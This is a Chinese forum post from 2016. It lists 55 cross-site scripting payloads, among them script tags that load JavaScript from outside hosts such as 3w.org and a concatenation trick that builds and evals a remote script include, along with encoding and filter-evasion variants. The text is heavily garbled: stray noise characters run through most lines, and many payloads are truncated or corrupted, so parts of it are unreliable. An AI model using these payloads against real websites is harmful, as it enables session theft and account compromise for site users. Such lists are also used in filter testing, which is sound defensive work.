(1)普通的XSS JavaScript注入
, |* t! P. O \5 \8 ], |. X% J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- ~ x. w- ~7 ^; f3 r3 z8 I
(99)另类弹框( a i6 `8 I l0 B9 k" }
<q/oncut=alert()>13 T2 U! a4 y# z; F2 }
<s/onclick=alert()>b
# Q6 b( A8 C1 {( m$ K. ^$ k <XSS=" onclick="alert(1)//">clickme</SSX=">
' }1 q% f& y' } <zzz onclick=alert`1`>clickme</zzz> - W5 N! j5 h& A, E
<a onclick=alert`1`>clickme</a>
2 H7 N( Z7 v% J6 I t) p8 I, e/ _<a=">clickme</a="># e8 ~* P2 n8 j* \# C9 {
<a=">clickme</a>( g3 ~" ^! Z! M% H* S& Y
<z=">clickme</z=">
: B6 d- [5 N4 {<z onclick=alert`1`>clickme</z>; f& c ?# T- i% w
) m6 i8 |* Y2 N" a. }(2)IMG标签XSS使用JavaScript命令
# A' w3 ^; M6 K* |" U<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
g( n2 v T( T$ w+ t, t. V0 ?# i1 s* ~, B$ U
(3)IMG标签无分号无引号9 e+ j% R2 N: Y, D" g0 p
<IMG SRC=javascript:alert(‘XSS’)>
( G- {2 |9 | F0 _% i m6 e8 h9 X" k2 R# J
(4)IMG标签大小写不敏感
5 _/ y9 l3 v, P, P<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" m9 N8 N8 e" T/ |- _! _* s- N! x& m; z/ P/ e
(5)HTML编码(必须有分号)1 [( }6 L1 W* _/ g
<IMG SRC=javascript:alert(“XSS”)>
, H0 g& ]; l" ~4 h8 f) ~6 \# ?6 |; p) V# j C
(6)修正缺陷IMG标签
8 Q4 V; ^0 p. o* d5 O) [<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 D% j- `& \/ v Q# l; B Z* R% N2 U5 [5 e# P6 O1 c: A7 `3 S
(7)formCharCode标签(计算器). k- L' V6 [0 G) @: C' r5 l
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 N. i6 y( q" j" R# R
0 x- l! ]# S' e {" I, Q) b( |(8)UTF-8的Unicode编码(计算器)- U2 H# O( m; [6 n* i4 }
<IMG SRC=jav..省略..S')>
' c; h6 [9 a0 Q, Z# d' |% X2 h2 q" \! ]0 W P+ s, J# k8 `$ G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 W9 G$ A( a7 G, K# p<IMG SRC=jav..省略..S')>' D7 B+ m: k. {0 }
3 w" r$ E! U9 k5 I. e+ U(10)十六进制编码也是没有分号(计算器)6 f/ `6 Q6 p% N) e
<IMG SRC=\'#\'" /span>; }0 R# Q- C; A) e( }6 T
$ V$ V7 N8 z9 \& P; T/ q(11)嵌入式标签,将Javascript分开
' E; Z0 I) b; y3 y) t<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
) A( W' a2 g8 o/ s! t4 s
- \$ }7 i6 [3 U: N* D(12)嵌入式编码标签,将Javascript分开
( G: i9 f" g+ k1 A0 o1 K5 l<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>. w- H P3 B n% u
* ^; v. \* X% p' O, D2 ]. t9 n
(13)嵌入式换行符
- Y- r. [2 u) _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' o- e: ]8 r# X- r* x: J9 `( ]8 J j3 V3 y( e! K' b- o" w
(14)嵌入式回车" D' u7 k8 ~8 K: f5 g% ?
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ F( S) o8 y4 Y# \
! j0 ?7 h% n+ p4 ?8 q7 Q* w(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 e- m+ Q# `3 N6 V
<IMG SRC=\'#\'" /span>
" ]2 N1 H" g6 P" B) {
5 g, _0 y( ?2 y6 _$ f# k1 |$ Q(16)解决限制字符(要求同页面)
/ x0 b! L, b- p1 h8 B) X6 {1 y<script>z=’document.’</script>
5 g4 e* [. K, G2 m<script>z=z+’write(“‘</script>% l5 x9 T& N% u* v+ _' Y
<script>z=z+’<script’</script>9 v! w: N& G- y c+ y3 [
<script>z=z+’ src=ht’</script>
- E' L, j/ b0 k q( x: h<script>z=z+’tp://ww’</script># [ ]" `) ~! J; r x0 X- ]
<script>z=z+’w.shell’</script>
; C1 a* d x# T, ^/ D" I$ N9 `<script>z=z+’.net/1.’</script>
+ |9 |9 f* g# v6 a B0 m( ?<script>z=z+’js></sc’</script>+ X( h8 d- E7 C8 b' X* |3 L- ~
<script>z=z+’ript>”)’</script> r/ g/ j4 D2 A, i$ y4 x
<script>eval_r(z)</script>
" T% V" s% k9 L. h2 K: |5 p6 T$ o, j. @1 u c: f
(17)空字符! s. m- ~6 s( l2 g% z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 U8 ^9 Z% D# E, y3 Z) s' m
2 j9 n) s" p( X, Y/ v. w. r7 R5 z( m(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. i4 S7 ~: C6 }5 H* o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 H8 b9 s7 ]: \' h( T: }. b! K
' P! t% k0 X% c, f(19)Spaces和meta前的IMG标签4 m3 o8 Z; C" [7 A
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>5 x6 }6 n2 }! {+ P/ H
% c; ^# W5 R M(20)Non-alpha-non-digit XSS d; \9 A2 X* j# \6 h9 Q9 C
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ C/ R( t7 b r
- w Q" F. Z s1 X H4 A(21)Non-alpha-non-digit XSS to 2! R2 N' }7 i2 U& C' ^+ t
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( m9 n4 L, R; W# L4 I" L
; ^ W& w: p. m5 P. ^/ B2 G) ~2 k(22)Non-alpha-non-digit XSS to 31 ~" g1 q# |$ Z% G
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>( G- o( x( V( s
6 O9 S% ]/ _9 X% h% @ v
(23)双开括号4 b7 V: b; r8 k; F7 D8 [/ A
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" S& ^/ L, B0 K7 H, A
. Z# ?- G) b' W6 m: i+ J7 Z$ w' B
(24)无结束脚本标记(仅火狐等浏览器)
! n# [% z( ]6 L& R c<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ L/ E# l j- k* @* j
, G( a. ]1 {( I(25)无结束脚本标记25 ^+ u9 R2 l, W G- {- Y3 S
<SCRIPT SRC=//3w.org/XSS/xss.js>
K. Z8 A6 I: ? Y
% L6 v* W4 B+ o9 ^) e7 X1 p(26)半开的HTML/JavaScript XSS o4 @$ K: C& D% G
<IMG SRC=\'#\'" /span>/ P2 {, p/ R1 S5 d9 w) L* R0 g8 X
% F1 d. A" Z% k, w(27)双开角括号2 H/ e' p* g- e! M5 y, B
<iframe src=http://3w.org/XSS.html <
( q7 {0 J: P& {. R
* K! D; [6 B; `6 u(28)无单引号 双引号 分号: ^/ p& r( e0 R% n; M, d' y
<SCRIPT>a=/XSS/' O! ?3 f, Z: c- O
alert(a.source)</SCRIPT>
, s: J8 e0 M1 j% U8 B H% @; A$ c
(29)换码过滤的JavaScript
+ M* x H9 u) P' T8 G\”;alert(‘XSS’);//2 u2 ^" F$ e# u( Y, Q0 f
9 C7 n0 @5 C; U0 q- T/ c$ [(30)结束Title标签8 y$ l4 B; }0 E* j
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! F$ h: ?/ T( h1 T+ ^* m/ P
0 u) g+ ?0 [/ u7 U(31)Input Image1 M) i( {: k2 d; B: Q
<INPUT SRC=\'#\'" /span>. P& @9 b$ f1 k7 o' }- L
: s7 w* R# q( z; [4 O4 o
(32)BODY Image# c9 ?$ K& x- l$ l; X
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 t5 ]2 h+ O3 Q3 @+ z1 K# P
0 A" Y" t. q6 i. v% s3 u( X(33)BODY标签
& R5 m5 |5 ^" K! E# H8 L3 C<BODY(‘XSS’)>7 ]/ M0 N7 [7 Z
! V/ j- A/ v" J4 \# _) e5 t; m6 `(34)IMG Dynsrc
2 _. Q C( a/ M8 D<IMG DYNSRC=\'#\'" /span>
7 q1 H9 o1 f% X1 Q/ E$ }% d8 ]% x' p
' a6 N" D3 @# M9 a3 B( \8 D5 Y/ Y(35)IMG Lowsrc
' }* K. U+ Q5 V8 H) @3 u( z- ^4 t<IMG LOWSRC=\'#\'" /span>
8 }- `+ N+ Q) X0 ?( u. Y2 E& I! ?' a. V) c/ ?: f
(36)BGSOUND; _% K! Q, S# W( j& G
<BGSOUND SRC=\'#\'" /span>; R, `# T0 `3 S* x: F
E; M/ V* h! @ K" ~( E/ L(37)STYLE sheet
* J& P' d8 o9 P; I6 D<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! h; O0 ~7 P/ O4 g: b( K
! Q& l* t# `! W(38)远程样式表! y2 H$ U; w1 c, ~ ~
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 V- S. r- e4 @& k6 p: N0 O+ V1 f B* v" p7 ^: @5 @
(39)List-style-image(列表式)4 Z- _2 t' u+ `/ v2 z
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 h1 Y8 |- M) {: v- M
5 {" f5 j' K( E0 P8 J" ^(40)IMG VBscript* _- k* E2 P! H; a6 N
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! i5 W; }$ b+ Z3 E. \) _# e& o+ ~( I: U `/ y
(41)META链接url
8 d! t; V; k" A M<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, H7 M! R1 ?3 C/ c: o
. B) h5 A( \" h, b(42)Iframe
3 Z6 @( O' j1 k# d: a<IFRAME SRC=\'#\'" /IFRAME>9 f, s! t* f0 a4 |" _4 k" _
: Z3 P5 ]( X$ E8 R( f
(43)Frame
) t5 U3 y. ~, k! O<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
k' P t2 _' m1 I0 ~
- r, z l$ ]) Q7 [; O9 @9 D7 S0 y(44)Table q& R6 x0 ?5 G
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) V; h" ?4 L3 {/ o8 r
, d4 e5 x7 b5 \5 O(45)TD# T8 C' L3 [" s# W) Y2 G5 [9 Q/ ~
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' X# M/ ?) D3 u" a( x6 q1 m
& i# c+ b$ }! X( t2 ^. x& ]
(46)DIV background-image3 t1 g, }7 H& t8 E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> B3 i2 e: ~1 c7 @. c
1 ~% n9 P! m6 Z3 c. C9 c+ l5 ~% a3 p& g(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
' D+ s4 Y; X# a<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
2 {1 }: B9 z8 ?; {, A7 i- ~! {+ \. a
5 A# {: [3 a7 ^2 n' ]$ M(48)DIV expression
! q: l' g- A0 U5 q5 V<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) [' R- o8 k$ g# z
2 b# S2 K K! }9 }, O" B(49)STYLE属性分拆表达5 a5 k2 i, b' t
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 r: m, N# F" O2 k% f& X" t3 C8 c
5 V) M5 J# Z* H1 ?
(50)匿名STYLE(组成:开角号和一个字母开头)+ b2 h$ p2 ^' [" L+ W- _% }4 C ]
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; Y8 [' ?) l, f7 E4 O9 c5 r% v6 f, p: i3 H9 C6 `" R
(51)STYLE background-image$ o. Q4 C( @4 E8 M5 i: I
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>% _" P J4 e$ f5 Z
, M! u) t+ ]5 Q(52)IMG STYLE方式 a/ [- U" t* b. L, l, a
exppression(alert(“XSS”))’>9 p n* Y% U! B3 G) w. M
1 Z; |- p: S! [1 g(53)STYLE background
* H* Z& s1 L& g<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) z) o1 R( S9 J& I% |! I, C2 x+ R+ u5 ?9 \: c8 O
(54)BASE
+ Q' a* z4 y' f( }" i5 _<BASE HREF=”javascript:alert(‘XSS’);//”>
@# ]' c% o( y& I3 Y& Q% X) l- w. x$ ?5 s( K
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
: x9 t4 i, a2 A# ~5 E( |<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
$ F4 u, c6 m* q* K' K% Z4 {# }+ d) h |
发表于 2016-4-28 10:06:15
收藏
支持
反对